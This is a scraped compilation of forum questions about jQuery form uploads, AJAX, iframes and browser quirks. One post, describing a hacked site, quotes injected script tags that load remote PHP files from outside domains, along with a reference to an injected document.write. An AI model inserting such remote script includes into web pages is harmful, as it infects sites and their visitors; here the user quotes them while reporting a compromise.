JQuery :: Jquery.form.js - Uploading Files Not Working
Jun 30, 2011
We are using balupton's history.js to process normal (without files) forms and jquery.form.js for these with files.
So our code looks like that:
$this.find('form.formularz').submit(function(event){
var
$this = $(this),
url = $this.attr('action');

I thought maybe it's something wrong with iframe, but there are requests made to server. On server side, there is 499 error code for IE (it's internal nginx error code, it says that browser closed connection before nginx even sent anything) and 408 for Firefox.
I get an error "Error: Form elements must not be named "submit"." when i have a form with the ability to upload files. If a file is selected for upload i get the error, and not when there is no file for upload. why is that? what difference does it make if there is a submit button?
I'm writing a class that will enable the user to upload files to the server without reloading the current page (using target="iframe"), and it works just fine in Firefox, but when I test it in IE, first of all, the iframe is not targetted at all, and IE stupidly opens a new window, second the <input type="file" element looses it's name attribute for some reason... I tried using DOM and assigning the element thru innerHTML, both will just not work in IE (and will just fine in Firefox). Those interested to have the source code (commented in french) may just ask me. But if anyone had similar problems, and would want to share with me, I'd really much appreciate, because this is driving me insane!
I have heard that there is a java script that enables clients to upload files through the browser from a page on my site. I have tried CGI and Perl but my server wont allow them.
Is there a way I can use JavaScript to compile a list of checkboxes with the value of the url of the file I wish to upload from my computer.And then with that checklist PHP can grab the files from my computer and upload them to the server. Doesn't have the be checkboxes but basically a list of locations so the files can be uploaded one after another. Much like Facebook's ability to upload multiple files. I can't find out how to select multiple files, so I figured just compile a list.
On uploading files (PHP and javascript) to the server from local machine via dreamweaver, Google Chrome reported the presence of malicious codes (like loto-49) inside the server page. Later when I checked, I found that a HTML Code:document.write('....loto-49.com....'); was automatically added at the end of each javascript *.js files. On their removal, the warnings were gone.Recently, they again appeared. Between the closure of the head tag (</head>) and the start of the body tag(<body>) the following code is added automatically:
HTML Code: <script src=http://hilalgroup.com/images/gifimg.php ></script> <script src=http://pianotainment.com/images/gifimg.php ></script>
I have some problems with the .load() function. On my local machine, everything is working fine. But, when I upload my document on my web server, the .load() function does not work anymore (with Safari, IE, Fx, ...) The code is here : [URL].
From the little I've read in this plugin's source code, ajaxSubmit() switches to "iframe mode" whenever it detects a file link in the form. The file is uploaded fine, but the server, which normally replies with different content. based on HTTP_X_REQUESTED_WITH header, fails to do its thing. This header is normally set to "XMLHttpRequest" on normal jQuery .ajax() calls.
The server I'm running is on rails, and I'm using the "request.xhr?" test.
I admit I'm not too familiar with iframes (or jQuery, for that matter:), but surely there must be a way to get around this, so that this can act as a simple drop-in replacement. Should I be looking at other headers, like "Accepts" or the kind, or should the plugin (or my code) be forcing the HTTP_X_REQUESTED_WITH header?
In my quest to implement ajax for the first time i've hit a brick wall. i've been searching for hours for a solution but with no success. Here is the problem.

why is it not working? my PHP code is outputting the contents of the xml document.
I have an ajax function which passes form field values to a PHP script which in turn saves the data to my database. all works great.
I now need to add a file input to my form and pass the file upload ot the same PHP script.
I have read an article [url] which explains how to do this but this would suggest it is a completely separate function.
My question is, is there anyway I can expand my existing function (below) to inlude the file upload process to save having 2 functions doing the same process?
I have very limited knowledge of web design and so even less knowledge of jquery.I have however redesigned my website using some bits if jquery (datepicker in a form, buttons and a tab menu)I've built this using wysiwyg web builder and im uploading it to just host.When I upload none of the jquery shows and all my pages are on top of one another URL..im guessing I have to save jquery in a new folder that has to be created but i'm unsure what.I thought home/username/public_html/twsremovals.co.uk/themes/theme_name/js would work but it hasnt (i have replaced username with my username and the theme name with what the theme is called.
Wantto import data from excel to SQL server from a web page, but wonder whether it is possible to do it without uploading the excel file from client's machine to server first.
I'm in charge of a project for a medical website and it is set up so that each 'page' of a questionnaire that users need to fill out has a corresponding Flash file to illustrate the parts of the body the page is referencing. The developer (who did the dynamic parts in ASP, I believe) set it up so the site pulls all of the questions from the database when the page loads and then uses Javascript show and hide sections to show the appropriate 'page'. He uses the same Javascript to figure out which Flash file is needed (based on the name of the page) and swap out the .swf's accordingly.
The only problem is that the Flash-switching part only works in Internet Explorer. The pages switch just fine, but the place where the Flash should be is blank. The developer told me he has never used Firefox and has no idea how to change his script to make it work for FF, so it's now up to me to figure it out. I'm a PHP developer with limited Javascript knowledge, so my only recourse is to ask for assistance from the experts here at Sitepoint. I've posted the Javascript and the HTML for the Flash file below.
Javascript: Code: function DisplayPage(PageNo){ if(ThisPage==PageNo){return}; var eles=document.getElementsByName("xdmenu"); var pic=document.getElementById("bodypic"); var bodyfile=""; switch(PageNo) { .....
HTML (this is where the Flash is embeded): HTML Code: <object name="bodypic" id="bodypic" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="[URL]" width="220" height="475"> <param name="movie" id="movie" value="../Html/Wrapper/man_xxxx.swf" /> <param name="quality" value="high" /> <embed src="../Html/Wrapper/man_xxxx.swf" quality="high" pluginspage="[URL]" type="application/x-shockwave-flash" width="220" height="475"></embed> </object>
I have the following code inside an include file which is included in my index.php page. All of my include files are placed in a folder called includes alongside my index file and the file ajax_getusers.php. When I have tested out this code all in one page it works fine but if I put the first section of code below in an include and include it in my index page it does not work at all. Is therer any reason for this?
Code:
<script type="text/javascript"> function showUser(str) { if (str=="")
I'm was able to successfully use your plugin for firefox, safari, chrome. When the form submits the request with file upload, here is the html I send back to the browser (via Rails): <textarea>{'status': 'success', 'avatar_url': '<%=@user.avatar.url(:medium)%>'}
I have designed a mail service in java.In my compose page,i want to attach some excel files of text files and to send it.After sending i want to store it my database.Then how can i download or open that file after opening that recipient mail inbox.
I have the following JavaScript (see below). The script requests an XML file from the server and displays it on the page.The script works fine when the requested XML file is stored on the same server as the script.The problem is when I try requesting an XML file from an external server such as the National Weather Service. I get an error. If I take the XML file from the National Weather Service and save it to my server it works. Why can't I use my script to request XML files stored on external servers?
Javascript Code
Code:
window.onload = initAll; var xhr = false; function initAll() { document.getElementById("makeTextRequest").onclick = getNewFile;
I want to write a javascript to list of all files in a folder including files in the subfolders. This is for the scorm purpose to list all the files. some examples are listing files but not listing the files inside the subdirectories. I want the file's full path like C:Documentsjavascriptwilson.js like this.
I've set up a simple form that validates then submits via Ajax using the jQuery Form Plugin by malsup. Everything is working now in FF, Chrome and Safari but it doesn't work in IE (7). I've just tried it out in Opera 10.6 and I get the same lack of functionality. My relevant code includes.
I should be more precise when I say it's not working in IE. When I click the submit button it runs the submit event, including the page scroll (which works). But all the $_POST's in the php file return null values. If I replace the ".ajaxSubmit()" with a "return true;" the normal submit event fires and everything works, but obviously without the ajax, which I need..
Problem is it used to work with all the browsers, after updating to latest firefox and chrome it is not responding to anything. It is working perfectly well with "Safari"
I cannot get the rules I define to process when validating a form in IE6. I found some folks couldn't use the minified version of the .js file, but I tried both and am still getting nowhere. This works in FF. The submitHandler runs (I'm showing an alert) but the validations aren't running. Below is the code.
<html> <head> <script src="jquery.js" type="text/javascript"></script> <script src="jquery.validate.js" type="text/javascript"></script> <script> $(document).ready(function() { var prospectTxErrors = { prospectName : { required : "An entry is required in field Prospect.", rangelength : "Prospect Name must be between 2 and 45 characters." }, .....
I have an upload form that is working fine with a submit button, but I really would like it to submit on its own without a submit button onChange when a user selects an image. I have it sending the form with onChange but it is not sending the uploaded file like when you hit the button! It is sending it as "example.jpg" instead of actually sending the file for upload.
